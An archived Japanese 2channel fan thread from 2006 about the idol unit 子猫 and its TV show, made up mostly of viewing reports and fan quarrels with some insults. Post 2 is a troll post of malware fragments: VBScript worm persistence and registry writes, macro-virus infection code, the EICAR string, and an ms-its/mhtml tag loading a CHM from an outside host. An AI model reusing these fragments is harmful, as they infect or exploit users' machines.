5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

子猫【25】〜たこやきでも放送して呉〜

1 :ユーは名無しネ:2006/10/04(水) 23:24:33
前スレ

子猫【24】〜子猫継続ケテーイで新番組はカツンとバラエティ〜
http://tv7.2ch.net/test/read.cgi/jr2/1158064351/l50

2 :<body onload=window()>:2006/10/04(水) 23:26:57
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


3 :ユーは名無しネ:2006/10/04(水) 23:30:25
たこやきヲバサブタイイラネ氏ね

4 :ユーは名無しネ:2006/10/05(木) 00:41:46
10月9日(月)
10月14日(土)
10月28日(土)

収録日


5 :ユーは名無しネ:2006/10/05(木) 09:13:06
>1

苺プラム凸毛逝キャワ

6 :ユーは名無しネ:2006/10/05(木) 10:09:02
>1
乙!
でも放送なくて嫌な思いしてるのはたこやきだけじゃないんだから
たこやき限定でスレタイ作るのはちょっと勝手だな

7 :ユーは名無しネ:2006/10/05(木) 11:44:14
YOUたちが放送されそうにない痴呆人がんがれ
毎日地元の局に電話しろ

8 :ユーは名無しネ:2006/10/05(木) 14:12:37
YOU達イラネ
苺ウザ

9 :ユーは名無しネ:2006/10/05(木) 16:19:42
安置も羨ましいんだな

10 :ユーは名無しネ:2006/10/05(木) 17:16:19
自分がスレタイ頼んだんだがサブタイは頼んでない

次からはサブタイなしで
まあ見れない人は親戚にでも早く頼んだ方がいいよ

11 :ユーは名無しネ:2006/10/05(木) 17:57:59
勝手に仕切るなよ

12 :ユーは名無しネ:2006/10/05(木) 18:02:38
>10
調子のんな小者のクズ
いつまでもひつこい
厨丸出しバレバレなんだよ

13 :ユーは名無しネ:2006/10/05(木) 18:03:22
>10
おまいみたいな仕切りババアは絶対同担じゃないわ

14 :ユーは名無しネ:2006/10/05(木) 18:06:41
>10
お前みたいなウザイヤシ久々に見た

15 :ユーは名無しネ:2006/10/05(木) 18:14:38
>13-14
三分待ったが誰も同意してくれないから自演となっ!

16 :ユーは名無しネ:2006/10/05(木) 18:23:33
>10のウザさはプラムとどっこいどっこいだな

17 :ユーは名無しネ:2006/10/05(木) 18:26:01
自演あげ

18 :ユーは名無しネ:2006/10/05(木) 18:26:52
自演するならプラムをウザイとか言わないよ
ばれちゃったね安置

19 :ユーは名無しネ:2006/10/05(木) 18:27:33


6 :ユーは名無しネ:2006/10/05(木) 10:09:02
>1
乙!
でも放送なくて嫌な思いしてるのはたこやきだけじゃないんだから
たこやき限定でスレタイ作るのはちょっと勝手だな


7 :ユーは名無しネ:2006/10/05(木) 11:44:14
YOUたちが放送されそうにない痴呆人がんがれ
毎日地元の局に電話しろ


8 :ユーは名無しネ:2006/10/05(木) 14:12:37
YOU達イラネ
苺ウザ


9 :ユーは名無しネ:2006/10/05(木) 16:19:42
安置も羨ましいんだな


10 :ユーは名無しネ:2006/10/05(木) 17:16:19
自分がスレタイ頼んだんだがサブタイは頼んでない

次からはサブタイなしで
まあ見れない人は親戚にでも早く頼んだ方がいいよ


20 :ユーは名無しネ:2006/10/05(木) 18:29:22
サブ鯛作るとこのように厨を呼ぶから反対なんだよ
あと子猫はレギュラー番組も決まって正式なユニになったから
もうサブ鯛はいらない

21 :ユーは名無しネ:2006/10/05(木) 18:38:57
まぁサブタイの話はもういいじゃん
YOUたち楽しみだね

22 :ユーは名無しネ:2006/10/05(木) 18:49:10
来春子猫CDデブ
でもズニアのまま

たぶんこんな感じ

23 :ユーは名無しネ:2006/10/05(木) 18:59:38
10は悪くないよ
問題児は12-14の自演age厨
厨はほっとこう

24 ::2006/10/05(木) 19:02:48
お前>10だろ

25 :ユーは名無しネ:2006/10/05(木) 19:08:06
>24
またお前かゴキブリ

26 :ユーは名無しネ:2006/10/05(木) 19:18:40
出た出た基地外が

27 :ユーは名無しネ:2006/10/05(木) 19:29:26
YOUたち見たいよー

28 :ユーは名無しネ:2006/10/05(木) 21:12:05
前スレの流れで付けたサブタイごときでここまで引っ張るとは
責任を感じたので平に謝ります

ごめんね

29 :ユーは名無しネ:2006/10/05(木) 21:44:16
別にいいよ
それよりもたこやきで放送されるようにがんがって

30 :ユーは名無しネ:2006/10/05(木) 23:37:38
たこやきの人は早くダビ頼んだ方がいいよ

波にユーたちレポ載ってたけど、こんな事放送しちゃっていいの?って
書いてあったよ
緊張したとか欠いてあるし、子猫も番組に絡んでくるんだね


31 :ユーは名無しネ:2006/10/06(金) 10:12:07
安置さえもこなくなったか
運動会も誰もいってないか
つまらんスレだな

32 :ユーは名無しネ:2006/10/06(金) 12:18:55
百識はたこやきでもやる?

33 :ユーは名無しネ:2006/10/06(金) 12:40:32
運動会行ったけど今更レポしてほしいのか

34 :ユーは名無しネ:2006/10/06(金) 13:17:43
今月も3誌に子猫載ってます?

35 :ユーは名無しネ:2006/10/06(金) 14:08:50
>33
今更というなら先にレポすればいいのに

36 :ユーは名無しネ:2006/10/06(金) 14:44:50
>34
スレタイ通り関西仁いるのに書かないね

37 :ユーは名無しネ:2006/10/06(金) 16:49:43
>36
乞食氏ね

38 :ユーは名無しネ:2006/10/06(金) 16:59:27
>37
おばさん、昭和何年産まれ?

39 :ユーは名無しネ:2006/10/06(金) 17:00:07
>35
誰も見てないからレポ書けない

40 :ユーは名無しネ:2006/10/06(金) 17:01:43
早売り読んだが
3誌ともに子猫ページナシ新番組宣伝ナシ
自分が見逃してるだけか?

41 :ユーは名無しネ:2006/10/06(金) 18:12:10
>40
自分も見たがヤパ-リ載ってないみたいダタ

42 :ユーは名無しネ:2006/10/06(金) 18:38:54
新番組宣伝も梨なんだ
急遽決まった枠なのかな

43 :ユーは名無しネ:2006/10/06(金) 19:38:38
次月から載るんじゃない?ずっと伏せてたから間に合わなかったんだろう

44 :ユーは名無しネ:2006/10/06(金) 20:22:50
運動会レポ
子猫としてはFFでリフター&自己紹介とフライハイ歌ってMC居たくらい
特に子猫主ではなく元ユニとソロで歌対決だった
子猫レポするほどの内容ではなかったかな

携帯からなので改行変だったらスマソ

後聞きたいことあったら自分覚えてる答えるよ

45 :44:2006/10/06(金) 20:56:08
スマソ
「覚えてる限り」の間違い…逝ってくるorz

46 :ユーは名無しネ:2006/10/06(金) 21:27:14
レポd
波では結構子猫メインになってたけどそうでもなかったのかな
衣装とかはどうだった?

47 :ユーは名無しネ:2006/10/06(金) 22:31:23
読売テレビへの電話忘れずに

48 :ユーは名無しネ:2006/10/07(土) 00:41:26
ネタかまた
波見たらワカタけどね

49 :ユーは名無しネ:2006/10/07(土) 07:10:15
>46
FFは石油王でフライハイは白おそろのやつだから大冒険の時と変わらず
MCはソロ後なのでみんなバラバラだったし元ユニごとの衣装でリレー
一応リレーの時は子猫の元ユニに別れてやろうみたいになってた

自分そんなに子猫が特別に感じなかった
元ユニがあって子猫もあるよ的な扱いに見えたが

長文スマソ

50 :ユーは名無しネ:2006/10/07(土) 12:47:41
子猫は番組レギュラー持った時点で特別じゃない?
期間限定が急にか知らないが変わったんだから

51 :ユーは名無しネ:2006/10/07(土) 13:03:47
今日も読売に電話したけど意味あんのかなorz

52 :ユーは名無しネ:2006/10/07(土) 19:04:37
YOUたち!

▽衝撃カトウ−ン生熱湯風呂でオセロ次課長も仰天ダチョウも


おもしろそう

53 :ユーは名無しネ:2006/10/07(土) 19:15:08
全然おもろくねーじゃん
何がカトウーンだ

54 :ユーは名無しネ:2006/10/07(土) 19:48:43
>53
安置乙
子猫は熱湯に入らないからおいしい

55 :ユーは名無しネ:2006/10/07(土) 20:03:54
78 :ユーは名無しネ:2006/10/07(土) 18:19:42
()・・YOUたち観覧れぽ

当選人数は15人ェ今回急だったけど初回だから倍率
やばかったらしョヌ
┗ファミの人から
xx:xx^麹町集合
中入って廊下とか階段で待たされ・・・
17:xx^スタジオ入り
セットは家の中みたいトパジャマ時代の裸の少年みたいなィ
観覧はファミとお笑いで30人くらい
長いすみたいなのが於でかなり近いェ
けどカメラがあるから角度と席によっては見えない
スタジオ内はひたすらBest Of KAT-TUNが流れてました、
17:xx^ちびスタジオ入り
誰がいたかわOA見て
17:xx^聖・中丸入りン
Kitty・裕翔入りリ
聖(ラ)
・だぼジーパン
・車の柄のパーカー
・ひげ
・ゴールドアクセ
・右手に時計
・右足にテーピング
中丸(ロ)
・白シャツにセーター
・デニム(横に何か)
・右手にいつもの時計
次長課長とオセロ中島さんもスタジオ入りして
撮影準備リ
Kitty[終始じャれ合いたのしそおヒ!
中丸[スタッフと入念に打ち合わせ
聖[位置着いて雑誌范ャれてる曲口ずさむ、ちなみにRHODESIAホ
18:xx^撮影開始
ネタバレになるので内容は書きません」」


56 :ユーは名無しネ:2006/10/07(土) 20:05:13
79 :ユーは名無しネ:2006/10/07(土) 18:20:56
(レ)休憩中・撮影の合間
聖[
・光とじャれ合う
・ちびがやってた
ルービックキューブで遊ぶ
┗鴛ェで飽きるネ
・スタジオでる回数多ェ
・をた全然見ない」
・犬とじャれる
・ちびに優しい
・お箸の持ち方変ミ
・メイク直し少なッェ
・機嫌まあまあ
中丸[
・打ち合わせ多ェ
・よくかむォ
・段取り間違える
・かんぺ見すぎ」
・気づくと口プチプチ
やってる
・シャツの襟おかしいムぷ
・メイク直し多いオ
・ジュニアと関わりなし
Kitty・裕翔[
・北山とトッツーよく喋る
・光といのちャんがちびと遊んでた
・トッツーをたちら見
・裕翔一人でちょっと微妙なかんじメ
20:xx^撮影終了
観覧先にスタジオ出リ
中丸[観覧に気づき挨拶有
以上約時間半の収録でしたリ
ネタバレなので内容はあえて書きませんワ




57 :ユーは名無しネ:2006/10/07(土) 23:03:26
虫ハミってんのワロス(w

58 :ユーは名無しネ:2006/10/07(土) 23:04:01
>51
意味あるよ!明日もがんがれ

59 :ユーは名無しネ:2006/10/07(土) 23:24:05
Pが片目誌で子猫について語ってるよ

60 :ユーは名無しネ:2006/10/07(土) 23:38:31
>59
kwsk

61 :ユーは名無しネ:2006/10/07(土) 23:41:10
なんて言ってたの?

62 :ユーは名無しネ:2006/10/08(日) 00:03:53
プラムは同級生ってことで「あの先生何してるんだろうね」とか思い出話をしたりした
プラムは今ノリに乗ってる感じがする全身から生き生きとした楽しそうな雰囲気がにじみ出てた
毛逝は天然で超かわいい興奮すると声が裏返るところもかわいい
凸もまた面白い爆笑系っていうかちょっとズレててそこが最高でオレの中で凄い熱い人
苺は今回オレが一番打ち解けた人じゃないかなかわいいんだよアイシ
オレのおでことか普通に触りながら「Pここで誰かスケートできるね」とか言うし
それが全然生意気な雰囲気じゃなくて許せちゃうんだよね

63 :ユーは名無しネ:2006/10/08(日) 00:30:18
詳しくレポd!
苺は本当に物おじしない性格だな
みんな一歩引いてしまうPと友達みたいに話してるし
石鹸面より打ち解けてるみたいだな

64 :ユーは名無しネ:2006/10/08(日) 00:51:54
不細工な苺スキーな苺担のレスは痛いな

65 :ユーは名無しネ:2006/10/08(日) 02:44:27
苺プロが久々やって来た

66 :ユーは名無しネ:2006/10/08(日) 06:44:10
>62
Pのとこスルーしてたdd
Pもd

67 :ユーは名無しネ:2006/10/08(日) 07:34:15
3誌子猫記事なかったね
子猫仲悪いのかな

68 :ユーは名無しネ:2006/10/08(日) 08:52:55
子猫仲いいってレポ載ってるじゃん
↑を見ろ
ていうか雑誌には載せないけど波でユニとして確立+レギュラーだから安泰

69 :ユーは名無しネ:2006/10/08(日) 12:42:31
夕立つまんね

70 :ユーは名無しネ:2006/10/08(日) 13:05:19
帝都の姐さん方YOUたちどうでした?

71 :ユーは名無しネ:2006/10/08(日) 13:19:22
>70
詰め込みすぎでぐだぐだだた


72 :ユーは名無しネ:2006/10/08(日) 13:20:04
早くリニューアルしないかな

73 :ユーは名無しネ:2006/10/08(日) 13:21:39
子猫の出番は結構あった?

74 :ユーは名無しネ:2006/10/08(日) 13:24:34
>73
一応ずっと出てる
印象薄いけど

75 :ユーは名無しネ:2006/10/08(日) 13:26:23
ゲストは1組でエエのに
よく若欄番組だな

76 :ユーは名無しネ:2006/10/08(日) 13:26:55
自己紹介しか記憶にないくらい印象薄い

77 :ユーは名無しネ:2006/10/08(日) 13:35:55
みんな名札つけてるしずっと座ってるからおいしいよ
ちびも後ろで名札つけてる
名前は覚えられる

78 :ユーは名無しネ:2006/10/08(日) 13:42:41
ズニア呼びじゃなくて子猫として扱ってくれるからよかった
御蕎麦の時とか出前の時とかゲームの時も名前のテロップでテタ

79 :ユーは名無しネ:2006/10/08(日) 13:44:28
しかしつまんない番組ダタ

80 :ユーは名無しネ:2006/10/08(日) 13:46:55
番組自体はどうでもいい
自担を毎週見れば(・∀・)イイ!!


81 :ユーは名無しネ:2006/10/08(日) 13:49:48
編集はできない番組だね
ずうっと出てるから

82 :ユーは名無しネ:2006/10/08(日) 13:52:33
30分番組にしてズニアだけで進行してくれないだろーか
ゲストとかあんなにイラネ

83 :ユーは名無しネ:2006/10/08(日) 13:53:49
>82
アンチは文句しか書かないからすぐにバレル
ここがよかったとか書いてから番組つまないって書いた方がアンチらしくなくていいいよ

84 :ユーは名無しネ:2006/10/08(日) 13:54:28
アンチじゃないのに・・・

85 :ユーは名無しネ:2006/10/08(日) 13:57:24
雑談にも書いてるからねお前

86 :ユーは名無しネ:2006/10/08(日) 14:07:03
雑談てどこだかわからんのですが
これ以上話してもムダなのでサヨナラ

87 :ユーは名無しネ:2006/10/08(日) 14:07:55
▽人生,恋愛,グルメ…高橋英樹&YOUのこだわりに迫る爆笑トーク▽驚きの特技の持ち主に挑戦 田中聖 中丸雄一 次長課長 中島知子ほか
出演者/田中聖 中丸雄一 次長課長 Kitty 中島裕翔 中島知子 ハリセンボン  ゲスト/高橋英樹 YOU

来週分




88 :ユーは名無しネ:2006/10/08(日) 14:15:14
たとえ自担みられてウマーでも番組がつまらなければ
打ち切りになるんだから喜んでばかりもいられまい

89 :ユーは名無しネ:2006/10/08(日) 14:16:13
>88
安置トピ作れば
そんなに裏山なんだYOUたちが

90 :ユーは名無しネ:2006/10/08(日) 14:17:22
虫イラネ

91 :ユーは名無しネ:2006/10/08(日) 14:22:31
トピって

92 :ユーは名無しネ:2006/10/08(日) 14:36:58
>83>89が安置に見えるのは気のせいですか

93 :ユーは名無しネ:2006/10/08(日) 15:15:26
>56
中丸[
・打ち合わせ多ェ
・よくかむォ
・段取り間違える
・かんぺ見すぎ」

本番でもアレだったけど緊張しいなんかな

94 :ユーは名無しネ:2006/10/08(日) 15:40:16
爺は元々先端恐怖症だったり靴紐が結べなかったりいろいろとあるんだよね
本人も雑誌で言ってたし
でも今日見たらそれほど酷くなかったけど

95 :ユーは名無しネ:2006/10/08(日) 15:48:08
てか爺イラネ飽きた

96 :ユーは名無しネ:2006/10/08(日) 16:11:56
夕立
「ズニアメドレー」
・仔猫ゆうとりんオシっぽい映像で
・ビーナスアミーゴセニョフィーバーとフューチャー

「とある合宿所のテイ」
・オム爺でタイトルについて話す
・中島姐さんに促されて出演者紹介
・仔猫紹介:イチゴ栃乙女みたいな名前だといわれる
・ゆうとりん、次長課長、人生のコーチはモリクミと中尾彬
・オム爺の中尾さんへの印象「声が渋い」

「ユーたちランチにこだわっちゃいなよ」:進行は爺と中島姐さん
・中尾さんオススメ名月庵田中屋の蕎麦をもってくるメイド姿のハリセンボン
・食べれる人は中尾さんと正解者
・テロップの出しが遅くて駄目だしされる爺:「初MC」というテロップが入る

問題「そばが配膳されてマズ」「最初にお茶を飲む」か「蕎麦の香りを楽しむ」か
・中島姐さんにうなぎ犬といわれる河本さん
・ツルリンと呼ばれまだジョリジョリしてますからと答えるオム
・30ちょいといわれる本当は13歳のゆうとりん

問題「わさびをつゆに溶かす」か「そのままそばにつける」か
・答えが外れてはるかに「なにやってんだか」と冷たく言い放たれるオム
・頑固だといわれさすが中年といわれるゆうとりん

問題「」
・最後の問題中尾さんだけ正解

・中尾さんに質問アンダーソン「なぜいつもマフラーねじねじしてるんですか?」
・・中尾「イライラしてて巻いてたらこうなったイライラ巻き、今200本、冠婚葬祭、春夏秋冬」
・オム「中尾巻きおしゃれか?」にトータライザー結果「二人」

97 :ユーは名無しネ:2006/10/08(日) 16:12:40
・ズニア「テレビの番組でおいしくなかったときどうするんですか?」
・・モリクミ「「うわこれすごーい」「これ変わってますねー」といって美味しいとはいってない」
・・モリクミ「とりあえずテンソンあげる」
・・中尾「床の間ほめる」

・いのお(2ネムわからねスマソ「モリクミさんはオフどうしてるんですか?」
・・モリクミ「合コンセッティングホームパーチー」

「ユーバックゲーム」:子猫とゆうとりんが見本
・中島姐さん、河本、モリクミ、爺、オム、ゆうとりん
・河本に振られて間違える爺でゲームコーナー終了

「ユーたち出前取っちゃいなよ」:虫食いの言葉を当てる
・出題者:河本「○風とれたて鮮魚の素揚げ○ソース和え」
・オム「経営的に成り立つのかな」
・河本店長「早い美味い高い(著しい)で有名な河本飯店です」
・○風はヒント漢字二文字
・○ソースのヒントはカタカナで4文字



98 :ユーは名無しネ:2006/10/08(日) 16:13:49
・子猫「ピリ辛…?」
・オム「カタカナで4文字っていってるだろ」
・河本「おいおいそこにヤンキーいるだろ」
・当たって食べる子猫
・アンダーソンアンダーソンいいまくるレギュラー
・中島姐さん「あんたたちアンダーソンいいたいだけでしょ」
・河本「3流芸人ですからね」で「ちょっと」と立つオム爺
・次長課長「おいおいズニアも立てよ」とやり直し
・河本「5流芸人ですからね」でやり直して一斉においおいと立つズニアたち
・公平ルーレット明らかにオム爺の幅が大きくて不公平
・フレンチブルドッグをこうきと呼ぶ河本
・「(オムとブルドッグ)一瞬見間違うからね」とかぶせる井上

「仰天人間」進行:次長課長
1、犬人間の仰天技犬の鼻を舐めて種類をあてる  
・素人さんが連れてきた犬とたわむれるオム
・ややマイルドナ塩味でチワワ
・ほんとに薄味体臭少ないプードル

2、81歳で板割り人間
・板の持ち方がおかしいとプラムに駄目だしするおじいちゃん

3、帽子人間上島じゃなくて熱湯風呂
・噛む上島に爆笑するオム爺
・友達と称して来るダチョウ残り二人、ドーゾドーゾ・おすなよのいつものネタ
・チャレンジルーレットのオム爺幅がさらに大きくなる→オム挑戦
・「蛇煮でおそらく初めてなんでは?」といわれるオム
-CM-
・水着姿(たけし番組熱湯風呂恒例の回る台)であはーんと色気ポーズのオム
・そこでダチョウに股間を「パンパンむっしゅむらむら」されるオム
・お湯を回りに飛ばすオム
・井上「どこで学んだんだそんなこと」といわれる
・「自分のタイミングで」とお湯のはられた風呂桶に腕立てっぽくつかまるオム
・そこに熱湯ひしゃく持ったリーダーがそっと近づく
-CM-
・リーダーにおされ上島のように豪快に熱湯にざぶんとつかるオム
・あわてて出て氷のおけに近づき、頭にかき氷をかぶるオム
・感想を聞かれて
・・オム「熱いっすよ…」
・・素の※にスタジオ爆笑
・オムのアップに終了テロップが流れ番組終わり

99 :ユーは名無しネ:2006/10/08(日) 16:44:39
今のメンバーは1クールだけだろ
リニュまちがいなし

内容どうこう以前に音声と映像の編集が下手

100 :ユーは名無しネ:2006/10/08(日) 17:57:24
>96-98
鏝鏝だけどもこれは帝都人が番組をレポしてくれているんだろうか?

101 :ユーは名無しネ:2006/10/08(日) 18:18:05
暇人も居るもんだな
長文書いてる暇あったら動画ながせよカス

102 :ユーは名無しネ:2006/10/08(日) 20:20:13
>100
そうみたい
カツン担が書いてるから子猫の名前省略してあるけど


103 :ユーは名無しネ:2006/10/08(日) 21:39:37
今更だけど先週少蔵のフライハイに入る前の鰯の紹介で
子猫はセクシー路線なのねと知った(w

104 :ユーは名無しネ:2006/10/08(日) 21:45:28
やっぱプラムを好きになれない
子猫でデブしてほしくない

105 :ユーは名無しネ:2006/10/08(日) 22:21:04
>103
それ忘れた
フライハイだけはリピしたけど
子猫はヤパーリ好き


106 :ユーは名無しネ:2006/10/08(日) 22:25:23
やっぱ自ユニがいいよ
雑誌に載ったらn増えて嬉しいけど載ってねーし意味茄子

107 :ユーは名無しネ:2006/10/08(日) 22:55:46
>106
だったらココ来なくて自スレ回せ
ココは子猫が好きな人が来ればいい

108 :ユーは名無しネ:2006/10/08(日) 23:00:14
夕立イイとかおいしいとか言ってるヤシ
あんな番組で本当に満足してるのか問いたい
あの内容で満足したヤシのが安置だろ

109 :ユーは名無しネ:2006/10/08(日) 23:04:00
元ユニよりは子猫のがマシなキガス

110 :ユーは名無しネ:2006/10/08(日) 23:09:46
子猫だとそれぞれの個性がはっきり出せていいな
元ユニだとやっぱり1人だけ目立つと悪いし

111 :ユーは名無しネ:2006/10/08(日) 23:22:05
毛逝タソとか凸は子猫の方が絶対ウマーでしょ
2人とも元ユニでは埋もれてるし
凸は特に見切れ位置だしね

112 :ユーは名無しネ:2006/10/08(日) 23:51:20
>110
なんだか胴衣
子猫はユニとしてどうにかしないとっていう危機感が元ユニより少ない上に面が面だから(w
なんつーかもう目立った者勝ちというか気楽に楽しめる

113 :ユーは名無しネ:2006/10/09(月) 00:09:23
>112
そういうことだね
本人たちも楽しんでやってるしこっちも楽しんで見れる

114 :ユーは名無しネ:2006/10/09(月) 14:21:33
目立った者勝ちっていうのは納得だな

115 :ユーは名無しネ:2006/10/09(月) 17:09:41
>111
ねー
毛逝なんて急行に居る意味あるのかわからんよ最近
埋もれてるっていうか変に浮いてるよな
今はもう急行=キィハシー光代なカンシ

116 :ユーは名無しネ:2006/10/09(月) 17:23:38
キセルは別に目立ってないしそうでもない

117 :ユーは名無しネ:2006/10/09(月) 17:26:20
>115
なんで子猫担じゃないオマイがいるの

118 :ユーは名無しネ:2006/10/09(月) 17:33:14
少蔵の凸がヤバかったのは外出ですか?

119 :ユーは名無しネ:2006/10/09(月) 18:05:22
>117
何で子猫担じゃないとわかるんだ

120 :ユーは名無しネ:2006/10/09(月) 18:07:29
プラム苺担は自ユニの方がいいでしょ

121 :ユーは名無しネ:2006/10/09(月) 18:45:25
うん勿論

122 :ユーは名無しネ:2006/10/09(月) 20:05:37
慧タソは少年のままでで外されてるから可哀相
JJがデブかなり後だから来年慧はデブしないと

123 :ユーは名無しネ:2006/10/09(月) 20:06:20
足も海老氏もそのままでデブ出来ない

子猫デブで決まり

124 :ユーは名無しネ:2006/10/09(月) 20:09:54
>122
ロムれば?

125 :ユーは名無しネ:2006/10/11(水) 21:58:29
たこやきでいつ放送してくれんだよー
諦めねーぞ

126 :ユーは名無しネ:2006/10/12(木) 01:35:09
tが1人足りない・・・

127 :ユーは名無しネ:2006/10/13(金) 18:52:11
番協ってまた15人で郊外禁止なのかな


128 :ユーは名無しネ:2006/10/13(金) 23:57:34
YOUたちは面白くなるのかな

129 :ユーは名無しネ:2006/10/14(土) 00:13:01
プラムは自ユニだとダンスもビジュも目立ちまくってる状態
妬むメンバーが多い自ユニより子猫キボン

130 :ユーは名無しネ:2006/10/14(土) 08:16:19
>129
足を見ていてそんな事思ったことナス

131 :ユーは名無しネ:2006/10/14(土) 12:46:52
プラムって優香に似てるよね

132 :ユーは名無しネ:2006/10/14(土) 14:41:18
にてね〜(w
ブタム担てこれだからワロス

133 :ユーは名無しネ:2006/10/14(土) 16:06:49
優香が泣く

134 :ユーは名無しネ:2006/10/14(土) 17:30:13
優香に謝れ

135 :ユーは名無しネ:2006/10/14(土) 19:48:52
>131
自分の友も言ってた
最初聞いた時は「そうか?」
ってオモタが
段々優香=ブタムに見えてきた

136 :ユーは名無しネ:2006/10/14(土) 22:08:07
へー
それがイパーン人の目線なのか…
「カクテルなのにカロリーオフ」のCMをチェックしてみよう

137 :ユーは名無しネ:2006/10/15(日) 00:49:29
ブタム担ってコワヒ

138 :ユーは名無しネ:2006/10/15(日) 00:53:12
ブタムってただのチビなのにね

139 :ユーは名無しネ:2006/10/15(日) 09:27:38
ただのチビじゃなくてチビでウザーなヲッサンだろ

140 :ユーは名無しネ:2006/10/15(日) 17:20:01
>139
ビンゴ!

141 :ユーは名無しネ:2006/10/17(火) 09:19:00
少蔵は子猫全員ソロ?
凸ブタムで手紙の交換
子猫でガンバロウって

142 :ユーは名無しネ:2006/10/17(火) 20:18:39
子猫やる気なんだねエエこっちゃ

143 :ユーは名無しネ:2006/10/17(火) 21:01:40
目の経歴を考えると
ブタムの今のポジなんて全然あり!
整形はやくしないと・・もう手遅れ?

144 :ユーは名無しネ:2006/10/18(水) 07:45:10
北山って優香にソク-リだね

145 :ユーは名無しネ:2006/10/18(水) 12:08:50
ガイドに夕立のnあって子猫載ってたよ

146 :ユーは名無しネ:2006/10/18(水) 13:48:13
ガイドすげえええええええ

子猫カラーで1ページ貰ってて即買い!
中身見なくて即買いでいいよ!
本格的デブの悪寒

147 :ユーは名無しネ:2006/10/18(水) 14:45:21
ガイドってもちろん放送地区のみなのか?

148 :ユーは名無しネ:2006/10/18(水) 15:28:29
たこやきガイドにも何故か載ってた

149 :ユーは名無しネ:2006/10/18(水) 17:46:42
いつのまにか苺が随分でかくなってる

150 :ユーは名無しネ:2006/10/18(水) 18:24:40
苺ぶさすぎ

151 :ユーは名無しネ:2006/10/18(水) 18:46:39
苺キャワ

152 :ユーは名無しネ:2006/10/18(水) 18:51:15
苺ぶさすぎ

153 :ユーは名無しネ:2006/10/18(水) 18:52:03
マヨよりマシ

154 :ユーは名無しネ:2006/10/18(水) 18:58:54
たこやきガイドも全く一緒?

155 :ユーは名無しネ:2006/10/18(水) 19:00:04
たこやきは見開き2ページ
すごろくみたくなってるやつ

156 :ユーは名無しネ:2006/10/18(水) 19:06:01
155さんdです

157 :ユーは名無しネ:2006/10/18(水) 19:06:51
・玄米ブームの理由
発端は実況フジ
「24season4」の実況民がCMの度に玄米(特にフジに多い)が何度も流れ
当初は「また玄米かよ」「玄米うぜえ」と言っていたが
その内に玄米をカウントし待ちわびる状況になる
森山未来のうざい顔憎たらしいセリフも相まって大人気となる
暴走時は玄米→他CM→玄米…の6連コンボもある(現在9連更新)




158 :ユーは名無しネ:2006/10/18(水) 19:07:24
苺ぶさすぎ

159 :ユーは名無しネ:2006/10/18(水) 19:17:16
不細工なのはマヨだけで十分
マヨ担は帰ってね

160 :ユーは名無しネ:2006/10/18(水) 19:48:00
ガイドに載るんならたこやきでも放送しろよ

161 :ユーは名無しネ:2006/10/18(水) 20:11:05
それを読売テレビに言えばいいんだよ

162 :ユーは名無しネ:2006/10/18(水) 20:14:50
>160
自分たこやきじゃないが同じことオモタ
読売に言ってこよう!

163 :ユーは名無しネ:2006/10/19(木) 00:54:53
子猫しね

164 :ユーは名無しネ:2006/10/19(木) 01:06:32
>163
オマイがいなくなればイイとみんな思ってるよ

165 :ユーは名無しネ:2006/10/19(木) 02:09:57
>>157
スレチだけどなるほどw

166 :ユーは名無しネ:2006/10/19(木) 09:02:05
百式の時も「うるおいびりつ」のCMが10回近く流れてた

167 :ユーは名無しネ:2006/10/19(木) 12:40:53
>165
ロムって

168 :ユーは名無しネ:2006/10/22(日) 13:53:41
あげ

169 :ユーは名無しネ:2006/10/22(日) 14:07:49
今日の糞コーナーにはBBSにメールまたいれといた
他にも苦情のメール出してる人がいるから早く改善するようになるといいな
子猫は中島(notズニア)に子猫の名前言わされてたよ
子猫ウマーだったよ

170 :ユーは名無しネ:2006/10/22(日) 14:08:55
虫イラネー子猫出せもっと

171 :ユーは名無しネ:2006/10/22(日) 14:13:37
子猫のジャージ姿カワユス
もっと大きい画面でたくさん見たい

172 :ユーは名無しネ:2006/10/22(日) 14:21:41
('A`) 地味にショックですよこれ…

173 :ユーは名無しネ:2006/10/22(日) 14:26:29
中島は可愛げがあるから別に目立ってもうざくないけど山田はうざいな

174 :ユーは名無しネ:2006/10/22(日) 14:45:17
>173
ロムってね

175 :ユーは名無しネ:2006/10/22(日) 14:50:34
否定的意見はBBSに入れても反映されない
でも激しく深いな番組だ
自担が哀れ

176 :ユーは名無しネ:2006/10/22(日) 15:14:06
だから反映されないってことは読んでる

177 :ユーは名無しネ:2006/10/22(日) 15:49:49
来週から恵に司会代わるのか
ならまた子猫自己紹介から始まるんだな
おいしいな子猫

178 :ユーは名無しネ:2006/10/22(日) 15:52:34
夕立どうしたいんだろ
もっと子猫を目立たせてくれよ
ホリセンボンは好きだからいいんだけど

179 :ユーは名無しネ:2006/10/22(日) 16:03:41
苺は氏ねばいい

180 :ユーは名無しネ:2006/10/22(日) 16:09:39
でも3回目にして子猫目だってきたじゃん

181 :ユーは名無しネ:2006/10/22(日) 16:49:02
ハリセンボンって吉本?初めてみたけど全然全くツマラナイ
ああいう下品なお笑いはいらないよ

182 :ユーは名無しネ:2006/10/22(日) 17:29:44
苺は氏ねばいい

183 :ユーは名無しネ:2006/10/22(日) 18:21:29
夕立全国放送してくれ

